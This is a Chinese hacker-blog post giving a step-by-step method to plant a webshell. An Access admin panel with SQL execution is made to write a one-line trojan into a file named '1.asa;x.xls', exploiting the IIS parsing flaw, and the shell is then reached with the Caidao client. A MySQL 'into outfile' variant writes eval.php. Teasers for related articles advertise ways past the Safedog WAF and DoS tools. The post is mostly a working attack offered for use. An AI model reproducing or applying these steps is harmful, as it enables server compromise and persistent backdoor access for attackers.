Access数据库导出一句话拿shell ***

hacker5年前黑客文章1030

实用环境,在Access后台其他 *** 不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

edt6J

逐一执行以下语句就可以导出一句话了
之一句代码
create table cmd (a varchar(50))
第二句代码
insert into cmd (a) values ('一句话木马')
第三句代码
select * into [a] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 4.0;' from cmd

第四句代码
drop table cmd

然后直接菜刀里连接http://www.xxoo.com/1.asa;x.xls

SQL语句意思解释:
之一句
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
第二句
在表cmd的a字段插入一句话木马
第三句
把cmd表a的内容导出到路径e:\web\mumaasp\的EXCEL文件
第四句
删除建立的cmd表

以下内容为测试:
Access利用后台SQL执行命令功能导出WebShell:
这个更简单:
Select 'asp一句话木马' into [vote] in 'e:\web\mumaasp\1.asa;x.xls' 'excel 8.0;' from vote或者
Select 'php一句话木马' into outfile 'F:/wwwroot/mumaasp.com/eval.php';
后台有执行SQL语句功能(vote为已知表段)

标签: 黑客技术

相关文章

黑客接单网站,黑客接单的平台有哪些

卡利Linux操作系统。该操作系统是基于Debian版本的系统,可用于数字取证和渗透测试。该系统由攻击性安全公司开发和保护。只有马蒂·阿哈罗尼(Mati Aharoni)和德文·卡恩斯(Devon K...

过安全狗技术总汇全集!!

过安全狗技术总汇全集!!

1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲: 1.过注入 方法一:a.asp?aaa=%00&id=...

Crowbar是完全免费的吗?

Crowbar是完全免费的吗?

什么叫Crowbar? Crowbar是怪力进攻专用工具之一,为您出示了一个机遇来操纵递交给Web服务端的內容。它不容易试着明确一个积极主动的答复,如打恰当的登录名或登陆密码组成,只是告诉你出示“标...

什么叫MBSAMicrosoftBaselineSec

什么叫MBSAMicrosoftBaselineSec

什么叫MBSA? Microsoft Baseline Security Analyzer或一般 称之为MBSA的便于应用的专用工具,可依据Microsoft安全系数提议协助明确电子计算机的安全性情...

DenialofService(DoS)系统漏洞的网址

DenialofService(DoS)系统漏洞的网址

Denial of Service (DoS)是分布式系统拒绝服务攻击攻击器;   doser.py是一款用Python撰写的于HTTP或HTTPS恳求的DoS专用工具;主要是对于有“ap...

Ngrep在全部电脑操作系统上工作中吗?

Ngrep在全部电脑操作系统上工作中吗?

什么叫Ngrep? 这一专用工具 - ngrep - (它是“互联网Grep”的联接)是一个在cmd中工作中的互联网数据文件解析器,它取决于pcap库和GNU regex库。ngrep与tcpdum...